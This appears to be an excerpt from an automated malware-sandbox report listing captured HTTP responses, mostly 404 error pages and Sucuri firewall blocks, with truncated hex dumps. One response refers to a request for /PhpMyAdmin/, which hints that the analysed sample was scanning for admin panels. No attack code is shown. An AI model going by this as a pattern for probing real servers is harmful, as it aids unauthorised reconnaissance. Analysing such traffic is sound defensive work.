Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Fri, 22 Dec 2023 20:14:53 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: 668198D4:DF7B_D5BA2113:0050_6585EE3C_245C:656Fx-iplb-instance: 51794Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 209Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /PhpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: IPB17Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 35 31 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: IPB17Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 35 31 64 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-127.ec2.internalX-Request-Id: 3e24c664-881e-4d96-82c8-4c4fef0823acData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-104.ec2.internalX-Request-Id: f7ed407b-45f9-4069-a1cd-647fa628ad65Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Accept-Ranges: bytesData Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 